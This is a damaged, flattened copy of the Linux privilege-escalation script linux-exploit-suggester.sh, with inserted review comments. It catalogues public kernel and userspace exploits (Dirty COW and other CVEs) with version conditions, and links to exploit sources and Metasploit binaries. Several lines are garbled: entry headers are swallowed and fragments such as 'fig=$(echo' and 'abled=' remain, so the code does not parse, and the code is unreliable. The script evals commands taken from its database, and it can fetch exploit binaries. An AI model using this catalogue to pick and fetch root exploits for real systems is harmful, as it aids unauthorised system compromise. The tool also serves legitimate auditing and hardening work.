debian=7|8,RHEL=5{kernel:2.6.(18|24|33)-*},RHEL=6{kernel:2.6.32-*|3.(0|2|6|8|10).*|2.6.33.9-rt31},RHEL=7{kernel:3.10.0-*|4.2.0-0.21.el7},ubuntu=16.04|14.04|12.04 Rank: 4 analysis-url: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh exploit-db: 40611 author: Phil Oester EOF ) EXPLOITS[((n++))]=$(cat <=2.6.22,ver<=4.8.3 Tags: debian=7|8,RHEL=5|6|7,ubuntu=14.04|12.04,ubuntu=10.04{kernel:2.6.32-21-generic},ubuntu=16.04{kernel:4.4.0-21-generic} Rank: 4 analysis-url: 
https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails ext-url: https://www.exploit-db.com/download/40847 Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh exploit-db: 40839 author: FireFart (author of exploit at EDB 40839); Gabriele Bonacini (author of exploit at 'ext-url') EOF ) EXPLOITS[((n++))]=$(cat <=4.4.0,ver<4.9,CONFIG_USER_NS=y,sysctl:kernel.unprivileged_userns_clone==1 Tags: ubuntu=(14.04|16.04){kernel:4.4.0-(21|22|24|28|31|34|36|38|42|43|45|47|51)-generic} Rank: 1 analysis-url: http://www.openwall.com/lists/oss-security/2016/12/06/1 Comments: CAP_NET_RAW capability is needed OR CONFIG_USER_NS=y needs to be enabled bin-url: https://raw.githubusercontent.com/rapid7/metasploit-framework/master/data/exploits/CVE-2016-8655/chocobo_root exploit-db: 40871 author: rebel EOF ) EXPLOITS[((n++))]=$(cat <=3.11,ver<4.8.14,CONFIG_USER_NS=y,sysctl:kernel.unprivileged_userns_clone==1 Tags: Rank: 1 analysis-url: https://github.com/xairy/kernel-exploits/tree/master/CVE-2016-9793 src-url: https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2016-9793/poc.c Comments: CAP_NET_ADMIN caps OR CONFIG_USER_NS=y needed. No SMEP/SMAP/KASLR bypass included. Tested in QEMU only exploit-db: 41995 author: Andrey 'xairy' Konovalov EOF ) EXPLOITS[((n++))]=$(cat <=2.6.18,ver<=4.9.11,CONFIG_IP_DCCP=[my] Tags: ubuntu=(14.04|16.04){kernel:4.4.0-62-generic} Rank: 1 analysis-url: http://www.openwall.com/lists/oss-security/2017/02/22/3 Comments: Requires Kernel be built with CONFIG_IP_DCCP enabled. 
Includes partial SMEP/SMAP bypass exploit-db: 41458 author: Andrey 'xairy' Konovalov EOF ) EXPLOITS[((n++))]=$(cat <=3.2,ver<=4.10.6,CONFIG_USER_NS=y,sysctl:kernel.unprivileged_userns_clone==1 Tags: ubuntu=16.04{kernel:4.8.0-(34|36|39|41|42|44|45)-generic} Rank: 1 analysis-url: https://googleprojectzero.blogspot.com/2017/05/exploiting-linux-kernel-via-packet.html src-url: https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2017-7308/poc.c ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2017-7308/poc.c Comments: CAP_NET_RAW cap or CONFIG_USER_NS=y needed. Modified version at 'ext-url' adds support for additional kernels bin-url: https://raw.githubusercontent.com/rapid7/metasploit-framework/master/data/exploits/cve-2017-7308/exploit exploit-db: 41994 author: Andrey 'xairy' Konovalov (orginal exploit author); Brendan Coles (author of exploit update at 'ext-url') EOF ) EXPLOITS[((n++))]=$(cat <=4.4,ver<=4.14.8,CONFIG_BPF_SYSCALL=y,sysctl:kernel.unprivileged_bpf_disabled!=1 Tags: debian=9.0{kernel:4.9.0-3-amd64},fedora=25|26|27,ubuntu=14.04{kernel:4.4.0-89-generic},ubuntu=(16.04|17.04){kernel:4.(8|10).0-(19|28|45)-generic} Rank: 5 analysis-url: https://ricklarabee.blogspot.com/2018/07/ebpf-and-analysis-of-get-rekt-linux.html Comments: CONFIG_BPF_SYSCALL needs to be set && kernel.unprivileged_bpf_disabled != 1 bin-url: https://raw.githubusercontent.com/rapid7/metasploit-framework/master/data/exploits/cve-2017-16995/exploit.out exploit-db: 45010 author: Rick Larabee EOF ) EXPLOITS[((n++))]=$(cat <=4.4,ver<=4.13,CONFIG_USER_NS=y,sysctl:kernel.unprivileged_userns_clone==1 Tags: ubuntu=14.04{kernel:4.4.0-*},ubuntu=16.04{kernel:4.8.0-*} Rank: 1 analysis-url: http://www.openwall.com/lists/oss-security/2017/08/13/1 src-url: https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2017-1000112/poc.c ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2017-1000112/poc.c Comments: CAP_NET_ADMIN cap or 
CONFIG_USER_NS=y needed. SMEP/KASLR bypass included. Modified version at 'ext-url' adds support for additional distros/kernels bin-url: https://raw.githubusercontent.com/rapid7/metasploit-framework/master/data/exploits/cve-2017-1000112/exploit.out exploit-db: author: Andrey 'xairy' Konovalov (orginal exploit author); Brendan Coles (author of exploit update at 'ext-url') EOF ) EXPLOITS[((n++))]=$(cat <=3.2,ver<=4.13,x86_64 Tags: RHEL=6,RHEL=7{kernel:3.10.0-514.21.2|3.10.0-514.26.1} Rank: 1 analysis-url: https://www.qualys.com/2017/09/26/linux-pie-cve-2017-1000253/cve-2017-1000253.txt src-url: https://www.qualys.com/2017/09/26/linux-pie-cve-2017-1000253/cve-2017-1000253.c exploit-db: 42887 author: Qualys Comments: EOF ) EXPLOITS[((n++))]=$(cat <=4.4,ver<=4.14.13,cmd:grep -qi rds /proc/modules,x86_64 Tags: ubuntu=16.04{kernel:4.4.0|4.8.0} Rank: 1 src-url: https://gist.githubusercontent.com/wbowling/9d32492bd96d9e7c3bf52e23a0ac30a4/raw/959325819c78248a6437102bb289bb8578a135cd/cve-2018-5333-poc.c ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2018-5333/cve-2018-5333.c Comments: rds.ko kernel module needs to be loaded. Modified version at 'ext-url' adds support for additional targets and bypassing KASLR. 
author: wbowling (orginal exploit author); bcoles (author of exploit update at 'ext-url') EOF ) EXPLOITS[((n++))]=$(cat <=4.15,ver<=4.19.2,CONFIG_USER_NS=y,sysctl:kernel.unprivileged_userns_clone==1,cmd:[ -u /usr/bin/newuidmap ],cmd:[ -u /usr/bin/newgidmap ] Tags: ubuntu=18.04{kernel:4.15.0-20-generic},fedora=28{kernel:4.16.3-301.fc28} Rank: 1 analysis-url: https://bugs.chromium.org/p/project-zero/issues/detail?id=1712 src-url: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/45886.zip exploit-db: 45886 author: Jann Horn Comments: CONFIG_USER_NS needs to be enabled EOF ) EXPLOITS[((n++))]=$(cat <=4,ver<5.1.17,sysctl:kernel.yama.ptrace_scope==0,x86_64 Tags: ubuntu=16.04{kernel:4.15.0-*},ubuntu=18.04{kernel:4.15.0-*},debian=9{kernel:4.9.0-*},debian=10{kernel:4.19.0-*},fedora=30{kernel:5.0.9-*} Rank: 1 analysis-url: https://bugs.chromium.org/p/project-zero/issues/detail?id=1903 src-url: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47133.zip ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2019-13272/poc.c Comments: Requires an active PolKit agent. 
exploit-db: 47133 exploit-db: 47163 author: Jann Horn (orginal exploit author); bcoles (author of exploit update at 'ext-url') EOF ) EXPLOITS[((n++))]=$(cat <=3,ver<5.0.19,CONFIG_USER_NS=y,sysctl:kernel.unprivileged_userns_clone==1,CONFIG_XFRM=y Tags: Rank: 1 analysis-url: https://duasynt.com/blog/ubuntu-centos-redhat-privesc bin-url: https://github.com/duasynt/xfrm_poc/raw/master/lucky0 Comments: CONFIG_USER_NS needs to be enabled; CONFIG_XFRM needs to be enabled author: Vitaly 'vnik' Nikolenko EOF ) ############ USERSPACE EXPLOITS ########################### n=0 EXPLOITS_USERSPACE[((n++))]=$(cat <=1.8.0,ver<=1.8.3 Tags: fedora=16 Rank: 1 analysis-url: http://seclists.org/fulldisclosure/2012/Jan/att-590/advisory_sudo.txt exploit-db: 18436 EOF ) EXPLOITS_USERSPACE[((n++))]=$(cat <=2.13,ver<=2.17,cmd:grep -qi apport /proc/sys/kernel/core_pattern Tags: ubuntu=14.04 Rank: 1 analysis-url: http://openwall.com/lists/oss-security/2015/04/14/4 src-url: https://gist.githubusercontent.com/taviso/0f02c255c13c5c113406/raw/eafac78dce51329b03bea7167f1271718bee4dcc/newpid.c exploit-db: 36746 EOF ) EXPLOITS_USERSPACE[((n++))]=$(cat <=2.13,ver<=2.17,cmd:grep -qi apport /proc/sys/kernel/core_pattern Tags: ubuntu=14.04.2 Rank: 1 analysis-url: http://openwall.com/lists/oss-security/2015/04/14/4 exploit-db: 36782 EOF ) EXPLOITS_USERSPACE[((n++))]=$(cat <=6.8,ver<=6.9 Tags: Rank: 1 analysis-url: http://www.openwall.com/lists/oss-security/2017/01/26/2 exploit-db: 41173 author: Federico Bento Comments: Needs admin interaction (root user needs to login via ssh to trigger exploitation) EOF ) EXPLOITS_USERSPACE[((n++))]=$(cat <=4.87,ver<=4.91 Tags: Rank: 1 analysis-url: https://www.qualys.com/2019/06/05/cve-2019-10149/return-wizard-rce-exim.txt exploit-db: 46996 author: raptor EOF ) EXPLOITS_USERSPACE[((n++))]=$(cat <=4.15 enabled: cmd:grep -Eqi '\spti' /proc/cpuinfo analysis-url: https://github.com/mzet-/les-res/blob/master/features/pti.md EOF ) FEATURES[((n++))]=$(cat <=3.14 analysis-url: 
# NOTE(review): lines 18-20 are the tail of linux-exploit-suggester.sh,
# still flattened one source line per page line. The start of line 18 is
# damaged: the last FEATURES heredoc and the head of usage() appear to have
# been swallowed together ("FEATURES[((n++))]=$(cat < - provide kernel
# version"; ..."), which leaves an unbalanced quote, so bash will not parse
# this copy as it stands; the option placeholders in the help text
# ("--uname - provide", "--pkglist-file - provide") lost their "<...>" words
# the same way. From exitWithErrMsg() onwards the functions are intact and
# are annotated below; doVersionComparision() at the end of line 20 is cut
# off at "case $?" and is not reviewed. Nothing in these lines is changed.
#
# usage(): the surviving tail prints the remaining option help
#   (-k/--kernel, -u/--uname, --skip-more-checks, --skip-pkg-versions,
#   -p/--pkglist-file, --cvelist-file, --checksec, -s/--fetch-sources,
#   -b/--fetch-binaries, -f/--full, -g/--short, --kernelspace-only,
#   --userspace-only, -d/--show-dos).
# exitWithErrMsg MSG: prints MSG to stderr and exits with status 1.
# parseUname "UNAME_A_STRING": fills globals from one `uname -a` line:
#   KERNEL     = 3rd field truncated at the first "-" (e.g. "4.15.0" from
#                "4.15.0-20-generic"),
#   KERNEL_ALL = the whole 3rd field,
#   ARCH       = second-to-last field (assumes the usual "... x86_64 GNU/Linux"
#                tail — TODO confirm on non-GNU userlands),
#   OS         = reset to "" and then set by case-insensitive substring
#                matches in this order: "deb"->debian, "ubuntu"->ubuntu,
#                "-ARCH"->arch, "-deepin"->deepin, "-MANJARO"->manjaro,
#                ".fc"->fedora, ".el"->RHEL, ".mga"->mageia. Later matches
#                override earlier ones, so a string that contains both "deb"
#                and ".el" ends up as RHEL. The string (user-supplied via
#                -u/--uname) is only passed, quoted, to awk/grep — it is
#                never evaluated.
# NOTE(review): "# extracts all information ..." is a comment in the
#   original; once flattened it swallows the rest of this page line, another
#   reason the text cannot be executed as shown.
https://github.com/mzet-/les-res/blob/master/features/stackprotector-strong.md EOF ) FEATURES[((n++))]=$(cat <=2.6.37 enabled: sysctl:kernel.dmesg_restrict!=0 analysis-url: https://github.com/mzet-/les-res/blob/master/features/dmesg_restrict.md EOF ) FEATURES[((n++))]=$(cat <=3.0 enabled: cmd:grep -qi smep /proc/cpuinfo analysis-url: https://github.com/mzet-/les-res/blob/master/features/smep.md EOF ) FEATURES[((n++))]=$(cat <=3.7 enabled: cmd:grep -qi smap /proc/cpuinfo analysis-url: https://github.com/mzet-/les-res/blob/master/features/smap.md EOF ) FEATURES[((n++))]=$(cat < - provide kernel version"; echo " -u | --uname - provide 'uname -a' string"; echo " --skip-more-checks - do not perform additional checks (kernel config, sysctl) to determine if exploit is applicable"; echo " --skip-pkg-versions - skip checking for exact userspace package version (helps to avoid false negatives)"; echo " -p | --pkglist-file - provide file with 'dpkg -l' or 'rpm -qa' command output"; echo " --cvelist-file - provide file with Linux kernel CVEs list"; echo " --checksec - list security related features for your HW/kernel"; echo " -s | --fetch-sources - automatically downloads source for matched exploit"; echo " -b | --fetch-binaries - automatically downloads binary for matched exploit if available"; echo " -f | --full - show full info about matched exploit"; echo " -g | --short - show shorten info about matched exploit"; echo " --kernelspace-only - show only kernel vulnerabilities"; echo " --userspace-only - show only userspace vulnerabilities"; echo " -d | --show-dos - show also DoSes in results"; } exitWithErrMsg() { echo "$1" 1>&2; exit 1; } # extracts all information from output of 'uname -a' command parseUname() { local uname=$1; KERNEL=$(echo "$uname" | awk '{print $3}' | cut -d '-' -f 1); KERNEL_ALL=$(echo "$uname" | awk '{print $3}'); ARCH=$(echo "$uname" | awk '{print $(NF-1)}'); OS=""; echo "$uname" | grep -q -i 'deb' && OS="debian"; echo "$uname" | grep -q -i 'ubuntu' 
# (line 19) parseUname continues, then:
# getPkgList DISTRO PKGLIST_FILE: fills the global PKG_LIST and may override
#   the global OS. When -p was given (opt_pkglist_file=true) and the file
#   exists, its format is sniffed in this order:
#     * first line contains "Desired=Unknown/Install/Remove/Purge/Hold"
#       (dpkg -l header): PKG_LIST = fields 2 and 3 joined with "-", ":amd64"
#       stripped; OS=debian, or ubuntu if "ubuntu" appears anywhere in the file;
#     * any ".elN." / ".elN_" token: whole file, OS=RHEL;
#     * the fedora test (see below); whole file, OS=fedora;
#     * any ".mgaN": whole file, OS=mageia;
#     * any " N." (pacman "name version" lines): fields 1-2 joined with "-",
#       OS=arch;
#     * otherwise PKG_LIST="".
#   Without -p it runs dpkg -l / rpm -qa / pacman -Q / equery according to
#   DISTRO (continues on line 20).
# Defects, recorded here rather than fixed (text kept byte-identical):
#   * `if [ $(head -1 ... | grep 'Desired=...') ]` leaves the command
#     substitution unquoted; it works only because that header is a single
#     word. `[ -n "$(...)" ]` or `grep -q` would be the robust form.
#   * `grep -E '\.fc[1-9]+'i "$pkglist_file"`: the `i` after the closing
#     quote (typo or copy artefact) is glued onto the pattern, which becomes
#     `\.fc[1-9]+i`. A Fedora package list (e.g. ".fc30.x86_64") therefore
#     most likely fails this test and falls through to the later branches.
#   * A -p file is trusted as-is; presumably the version strings it yields
#     are later fed to verComparision (line 20), where non-numeric components
#     abort the arithmetic — TODO confirm against the caller.
&& OS="ubuntu"; echo "$uname" | grep -q -i '\-ARCH' && OS="arch"; echo "$uname" | grep -q -i '\-deepin' && OS="deepin"; echo "$uname" | grep -q -i '\-MANJARO' && OS="manjaro"; echo "$uname" | grep -q -i '\.fc' && OS="fedora"; echo "$uname" | grep -q -i '\.el' && OS="RHEL"; echo "$uname" | grep -q -i '\.mga' && OS="mageia"; } getPkgList() { local distro=$1; local pkglist_file=$2; if [ "$opt_pkglist_file" = "true" -a -e "$pkglist_file" ]; then if [ $(head -1 "$pkglist_file" | grep 'Desired=Unknown/Install/Remove/Purge/Hold') ]; then PKG_LIST=$(cat "$pkglist_file" | awk '{print $2"-"$3}' | sed 's/:amd64//g'); OS="debian"; [ "$(grep ubuntu "$pkglist_file")" ] && OS="ubuntu" elif [ "$(grep -E '\.el[1-9]+[\._]' "$pkglist_file" | head -1)" ]; then PKG_LIST=$(cat "$pkglist_file"); OS="RHEL" elif [ "$(grep -E '\.fc[1-9]+'i "$pkglist_file" | head -1)" ]; then PKG_LIST=$(cat "$pkglist_file"); OS="fedora" elif [ "$(grep -E '\.mga[1-9]+' "$pkglist_file" | head -1)" ]; then PKG_LIST=$(cat "$pkglist_file"); OS="mageia" elif [ "$(grep -E '\ [0-9]+\.' 
# (line 20) getPkgList continues: debian/ubuntu/deepin -> `dpkg -l` (fields 2-3,
#   ":amd64" stripped); RHEL/fedora/mageia -> `rpm -qa`; arch/manjaro ->
#   `pacman -Q` (fields 1-2 joined with "-"); a Gentoo host with
#   /usr/bin/equery -> "name:version" pairs; anything else -> PKG_LIST="".
#   All of these rely on the caller's PATH except the explicit equery path.
# verComparision A B: compares dot-separated numeric versions. Returns 0 when
#   A == B, 1 when A > B, 2 when A < B. The shorter version is right-padded
#   with zeros, so "4.4" == "4.4.0". Each component is read with the `10#`
#   prefix so leading zeros are not taken as octal. Caveats visible here:
#   the first `[[ $1 == $2 ]]` has an unquoted right-hand side, i.e. B is a
#   glob pattern (harmless for digit strings); components must be plain
#   digits — something like "rc1" makes the (( )) expansion fail with a bash
#   arithmetic error rather than return a code; and `ver1=($1)` / `ver2=($2)`
#   are unquoted, so whitespace in a version would split it further.
# doVersionComparision REQ_VERSION RELATION CURRENT_VERSION: starts here —
#   note the unquoted `verComparision $currentVersion $reqVersion` — but is
#   cut at "case $?"; the rest is outside this page.
"$pkglist_file" | head -1)" ]; then PKG_LIST=$(cat "$pkglist_file" | awk '{print $1"-"$2}'); OS="arch" else PKG_LIST=""; fi; elif [ "$distro" = "debian" -o "$distro" = "ubuntu" -o "$distro" = "deepin" ]; then PKG_LIST=$(dpkg -l | awk '{print $2"-"$3}' | sed 's/:amd64//g'); elif [ "$distro" = "RHEL" -o "$distro" = "fedora" -o "$distro" = "mageia" ]; then PKG_LIST=$(rpm -qa); elif [ "$distro" = "arch" -o "$distro" = "manjaro" ]; then PKG_LIST=$(pacman -Q | awk '{print $1"-"$2}'); elif [ -x /usr/bin/equery ]; then PKG_LIST=$(/usr/bin/equery --quiet list '*' -F '$name:$version' | cut -d/ -f2- | awk '{print $1":"$2}'); else PKG_LIST=""; fi; } # from: https://stackoverflow.com/questions/4023830/how-compare-two-strings-in-dot-separated-version-format-in-bash verComparision() { if [[ $1 == $2 ]]; then return 0; fi; local IFS=.; local i ver1=($1) ver2=($2); for ((i=${#ver1[@]}; i<${#ver2[@]}; i++)); do ver1[i]=0; done; for ((i=0; i<${#ver1[@]}; i++)); do if [[ -z ${ver2[i]} ]]; then ver2[i]=0; fi; if ((10#${ver1[i]} > 10#${ver2[i]})); then return 1; fi; if ((10#${ver1[i]} < 10#${ver2[i]})); then return 2; fi; done; return 0; } doVersionComparision() { local reqVersion="$1"; local reqRelation="$2"; local currentVersion="$3"; verComparision $currentVersion $reqVersion; case $? 
in 0) currentRelation='=';; 1) currentRelation='>';; 2) currentRelation='<';; esac; if [ "$reqRelation" == "=" ]; then [ $currentRelation == "=" ] && return 0; elif [ "$reqRelation" == ">" ]; then [ $currentRelation == ">" ] && return 0; elif [ "$reqRelation" == "<" ]; then [ $currentRelation == "<" ] && return 0; elif [ "$reqRelation" == ">=" ]; then [ $currentRelation == "=" ] && return 0; [ $currentRelation == ">" ] && return 0; elif [ "$reqRelation" == "<=" ]; then [ $currentRelation == "=" ] && return 0; [ $currentRelation == "<" ] && return 0; fi; } compareValues() { curVal=$1; val=$2; sign=$3; if [ "$sign" == "==" ]; then [ "$val" == "$curVal" ] && return 0; elif [ "$sign" == "!=" ]; then [ "$val" != "$curVal" ] && return 0; fi; return 1; } checkRequirement() { local IN="$1"; local pkgName="${2:4}"; if [[ "$IN" =~ ^pkg=.*$ ]]; then [ ${pkgName} == "linux-kernel" ] && return 0; pkg=$(echo "$PKG_LIST" | grep -E -i "^$pkgName-[0-9]+" | head -1); if [ -n "$pkg" ]; then return 0; fi; elif [[ "$IN" =~ ^ver.*$ ]]; then version="${IN//[^0-9.]/}"; rest="${IN#ver}"; operator=${rest%$version}; if [ "$pkgName" == "linux-kernel" -o "$opt_checksec_mode" == "true" ]; then [ "$opt_cvelist_file" = "true" ] && return 0; doVersionComparision $version $operator $KERNEL && return 0; else pkg=$(echo "$PKG_LIST" | grep -E -i "^$pkgName-[0-9]+" | head -1); [ "$opt_skip_pkg_versions" = "true" -a -n "$pkg" ] && return 0; pkgVersion=$(echo "$pkg" | grep -E -i -o -e '-[\.0-9\+:p]+[-\+]' | cut -d':' -f2 | sed 's/[\+-]//g' | sed 's/p[0-9]//g') doVersionComparision $version $operator $pkgVersion && return 0; fi; elif [[ "$IN" =~ ^x86_64$ ]] && [ "$ARCH" == "x86_64" -o "$ARCH" == "" ]; then return 0; elif [[ "$IN" =~ ^x86$ ]] && [ "$ARCH" == "i386" -o "$ARCH" == "i686" -o "$ARCH" == "" ]; then return 0; elif [[ "$IN" =~ ^CONFIG_.*$ ]]; then [ "$opt_skip_more_checks" = "true" ] && return 0; if [ -n "$KCONFIG" ]; then if $KCONFIG | grep -E -qi $IN; then return 0; else return 1; fi else 
return 0; fi; elif [[ "$IN" =~ ^sysctl:.*$ ]]; then [ "$opt_skip_more_checks" = "true" ] && return 0; sysctlCondition="${IN:7}"; if echo $sysctlCondition | grep -qi "!="; then sign="!="; elif echo $sysctlCondition | grep -qi "=="; then sign="=="; else exitWithErrMsg "Wrong sysctl condition. There is syntax error in your features DB. Aborting."; fi; val=$(echo "$sysctlCondition" | awk -F "$sign" '{print $2}'); entry=$(echo "$sysctlCondition" | awk -F "$sign" '{print $1}'); curVal=$(/sbin/sysctl -a 2> /dev/null | grep "$entry" | awk -F'=' '{print $2}'); [ -z "$curVal" -a "$opt_checksec_mode" = "true" ] && return 2; [ -z "$curVal" ] && return 0; compareValues $curVal $val $sign && return 0; elif [[ "$IN" =~ ^cmd:.*$ ]]; then [ "$opt_skip_more_checks" = "true" ] && return 0; cmd="${IN:4}"; if eval "${cmd}"; then return 0; fi; fi; return 1; } getKernelConfig() { if [ -f /proc/config.gz ] ; then KCONFIG="zcat /proc/config.gz"; elif [ -f /boot/config-`uname -r` ] ; then KCONFIG="cat /boot/config-`uname -r`"; elif [ -f "${KBUILD_OUTPUT:-/usr/src/linux}"/.config ] ; then KCONFIG="cat ${KBUILD_OUTPUT:-/usr/src/linux}/.config"; else KCONFIG=""; fi; } checksecMode() { MODE=0; for FEATURE in "${FEATURES[@]}"; do i=0 while read -r line; do arr[i]="$line"; i=$((i + 1)) done <<< "$FEATURE"; NAME="${arr[0]}"; PRE_NAME="${NAME:0:8}"; NAME="${NAME:9}"; if [ "${PRE_NAME}" = "section:" ]; then advance to next MODE; + 1)) echo echo -e "${bldwht}${NAME}${txtrst}" echo continue fi AVAILABLE="${arr[1]}" && AVAILABLE="${AVAILABLE:11}" ENABLE=$(echo "$FEATURE" | grep "enabled: " | awk -F'ed: ' '{print $2}') analysis_url=$(echo "$FEATURE" | grep "analysis-url: " | awk '{print $2}') # split line with availability requirements & loop thru all availability reqs one by one & check whether it is met IFS=',' read -r -a array <<< "$AVAILABLE" AVAILABLE_REQS_NUM=${#array[@]} AVAILABLE_PASSED_REQ=0 CONFIG="" for REQ in "${array[@]}"; do find CONFIG_ name (if present) for current feature (only for 
display purposes) [ -z "$CONFIG" ]; then fig=$(echo "$REQ" | grep "CONFIG_") -n "$config" ] && CONFIG="($(echo $REQ | cut -d'=' -f1))" if (checkRequirement "$REQ"); then AVAILABLE_PASSED_REQ=$(($AVAILABLE_PASSED_REQ + 1)); else break; fi done # split line with enablement requirements & loop thru all enablement reqs one by one & check whether it is met ENABLE_PASSED_REQ=0 ENABLE_REQS_NUM=0 noSysctl=0 if [ -n "$ENABLE" ]; then IFS=',' read -r -a array <<< "$ENABLE"; ENABLE_REQS_NUM=${#array[@]}; for REQ in "${array[@]}"; do cmdStdout=$(checkRequirement "$REQ"); retVal=$?; if [ $retVal -eq 0 ]; then ENABLE_PASSED_REQ=$(($ENABLE_PASSED_REQ + 1)); elif [ $retVal -eq 2 ]; then noSysctl=1; break; else break; fi; done; fi feature=$(echo "$FEATURE" | grep "feature: " | cut -d' ' -f 2-) if [ -n "$cmdStdout" ]; then if [ "$cmdStdout" -eq 0 ]; then state="[ ${txtred}Set to $cmdStdout${txtrst} ]"; else state="[ ${txtgrn}Set to $cmdStdout${txtrst} ]"; fi; else unknown="[ ${txtgray}Unknown${txtrst} ]"; if [ $MODE -eq 3 ]; then enabled="[ ${txtgrn}Enabled${txtrst} ]"; disabled="[ ${txtgray}N/A${txtrst} ]"; elif [ $MODE -eq 4 ]; then enabled="[ ${txtred}Exposed${txtrst} ]"; disabled="[ ${txtgrn}Locked${txtrst} ]"; else abled="[ ${txtgrn}Enabled${txtrst} ]"; ${txtred}Disabled${txtrst} ]" fi if [ -z "$KCONFIG" -a "$ENABLE_REQS_NUM" = 0 ]; then state=$unknown elif [ $AVAILABLE_PASSED_REQ -eq $AVAILABLE_REQS_NUM -a $ENABLE_PASSED_REQ -eq $ENABLE_REQS_NUM ]; then state=$enabled else state=$disabled fi fi echo -e " $state $feature ${wht}${CONFIG}${txtrst}" [ -n "$analysis_url" ] && echo -e " $analysis_url" echo done } displayExposure() { RANK=$1 if [ "$RANK" -ge 6 ]; then echo "highly probable" elif [ "$RANK" -ge 3 ]; then echo "probable" else echo "less probable" fi } # parse command line parameters ARGS=$(getopt --options $SHORTOPTS --longoptions $LONGOPTS -- "$@") [ $? != 0 ] && exitWithErrMsg "Aborting." 
eval set -- "$ARGS" while true; do case "$1" in -u|--uname) shift UNAME_A="$1" opt_uname_string=true ;; -V|--version) version exit 0 ;; -h|--help) usage exit 0 ;; -f|--full) opt_full=true ;; -g|--short) opt_summary=true ;; -b|--fetch-binaries) opt_fetch_bins=true ;; -s|--fetch-sources) opt_fetch_srcs=true ;; -k|--kernel) shift KERNEL="$1" opt_kernel_version=true ;; -d|--show-dos) opt_show_dos=true ;; -p|--pkglist-file) shift PKGLIST_FILE="$1" opt_pkglist_file=true ;; --cvelist-file) shift CVELIST_FILE="$1" opt_cvelist_file=true ;; --checksec) opt_checksec_mode=true ;; --kernelspace-only) opt_kernel_only=true ;; --userspace-only) opt_userspace_only=true ;; --skip-more-checks) opt_skip_more_checks=true ;; --skip-pkg-versions) opt_skip_pkg_versions=true ;; *) shift if [ "$#" != "0" ]; then exitWithErrMsg "Unknown option '$1'. Aborting." fi break ;; esac shift done # check Bash version (associative arrays need Bash in version 4.0+) if ((BASH_VERSINFO[0] < 4)); then exitWithErrMsg "Script needs Bash in version 4.0 or newer. Aborting." fi # exit if both --kernel and --uname are set [ "$opt_kernel_version" = "true" ] && [ $opt_uname_string = "true" ] && exitWithErrMsg "Switches -u|--uname and -k|--kernel are mutually exclusive. Aborting." # exit if both --full and --short are set [ "$opt_full" = "true" ] && [ $opt_summary = "true" ] && exitWithErrMsg "Switches -f|--full and -g|--short are mutually exclusive. Aborting." # --cvelist-file mode is standalone mode and is not applicable when one of -k | -u | -p | --checksec switches are set if [ "$opt_cvelist_file" = "true" ]; then [ ! -e "$CVELIST_FILE" ] && exitWithErrMsg "Provided CVE list file does not exists. Aborting." [ "$opt_kernel_version" = "true" ] && exitWithErrMsg "Switches -k|--kernel and --cvelist-file are mutually exclusive. Aborting." [ "$opt_uname_string" = "true" ] && exitWithErrMsg "Switches -u|--uname and --cvelist-file are mutually exclusive. Aborting." 
[ "$opt_pkglist_file" = "true" ] && exitWithErrMsg "Switches -p|--pkglist-file and --cvelist-file are mutually exclusive. Aborting." fi # --checksec mode is standalone mode and is not applicable when one of -k | -u | -p | --cvelist-file switches are set if [ "$opt_checksec_mode" = "true" ]; then [ "$opt_kernel_version" = "true" ] && exitWithErrMsg "Switches -k|--kernel and --checksec are mutually exclusive. Aborting." [ "$opt_uname_string" = "true" ] && exitWithErrMsg "Switches -u|--uname and --checksec are mutually exclusive. Aborting." [ "$opt_pkglist_file" = "true" ] && exitWithErrMsg "Switches -p|--pkglist-file and --checksec are mutually exclusive. Aborting." fi # extract kernel version and other OS info like distro name, distro version, etc. 3 possibilities here: # case 1: --kernel set if [ "$opt_kernel_version" == "true" ]; then # TODO: add kernel version number validation [ -z "$KERNEL" ] && exitWithErrMsg "Unrecognized kernel version given. Aborting." ARCH="" OS="" # do not perform additional checks on current machine opt_skip_more_checks=true # do not consider current OS getPkgList "" "$PKGLIST_FILE" # case 2: --uname set elif [ "$opt_uname_string" == "true" ]; then [ -z "$UNAME_A" ] && exitWithErrMsg "uname string empty. Aborting." parseUname "$UNAME_A" # do not perform additional checks on current machine opt_skip_more_checks=true # do not consider current OS getPkgList "" "$PKGLIST_FILE" # case 3: --cvelist-file mode elif [ "$opt_cvelist_file" = "true" ]; then # get kernel configuration in this mode [ "$opt_skip_more_checks" = "false" ] && getKernelConfig # case 4: --checksec mode elif [ "$opt_checksec_mode" = "true" ]; then # this switch is not applicable in this mode opt_skip_more_checks=false # get kernel configuration in this mode getKernelConfig [ -z "$KCONFIG" ] && echo "WARNING. Kernel Config not found on the system results won't be complete." 
# launch checksec mode checksecMode exit 0 # case 5: no --uname | --kernel | --cvelist-file | --checksec set else # --pkglist-file NOT provided: take all info from current machine # case for vanilla execution: ./linux-exploit-suggester.sh if [ "$opt_pkglist_file" == "false" ]; then UNAME_A=$(uname -a) [ -z "$UNAME_A" ] && exitWithErrMsg "uname string empty. Aborting." parseUname "$UNAME_A" # get kernel configuration in this mode [ "$opt_skip_more_checks" = "false" ] && getKernelConfig # extract distribution version from /etc/os-release OR /etc/lsb-release [ -n "$OS" -a "$opt_skip_more_checks" = "false" ] && DISTRO=$(grep -s -E '^DISTRIB_RELEASE=|^VERSION_ID=' /etc/*-release | cut -d'=' -f2 | head -1 | tr -d '"') # extract package listing from current OS getPkgList "$OS" "" # --pkglist-file provided: only consider userspace exploits against provided package listing else KERNEL="" #TODO: extract machine arch from package listing ARCH="" unset EXPLOITS declare -A EXPLOITS getPkgList "" "$PKGLIST_FILE" # additional checks are not applicable for this mode opt_skip_more_checks=true fi fi echo echo -e "${bldwht}Available information:${txtrst}" echo [ -n "$KERNEL" ] 